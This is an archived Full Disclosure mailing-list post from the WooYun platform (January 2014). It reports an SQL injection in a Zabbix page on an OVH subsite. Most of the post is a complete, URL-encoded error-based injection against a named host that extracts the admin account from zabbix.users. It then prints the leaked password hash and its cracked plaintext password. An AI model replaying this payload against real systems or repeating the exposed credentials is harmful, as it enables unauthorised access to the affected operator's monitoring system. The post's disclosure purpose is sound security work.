Full Disclosure mailing list archives
[Wooyun] OVH a subsite Zabbix Sql injection
From: "En.wooyun.org" <help.en () wooyun org>
Date: Wed, 8 Jan 2014 00:33:04 +0800
*Abstract:* OVH a subsite Zabbix Sql injection. *Details:* url: http://r29901.ovh.net/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 *Proofs of concept:* [image: 内嵌图片 1] Admin~ca8949b7aab61bd78b2ebe12f08655fd ca8949b7aab61bd78b2ebe12f08655fd=xerox55 *From:* http://en.wooyun.org/bugs/wooyun-2013-042 -- WooYun, an Open and Free Vulnerability Reporting Platform For more information, please visit *http://en.wooyun.org/about.php <http://en.wooyun.org/about.php?>*
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [Wooyun] OVH a subsite Zabbix Sql injection En.wooyun.org (Jan 08)
- Message not available
- Re: [Wooyun] OVH a subsite Zabbix Sql injection thomas . soete (Jan 09)
- Message not available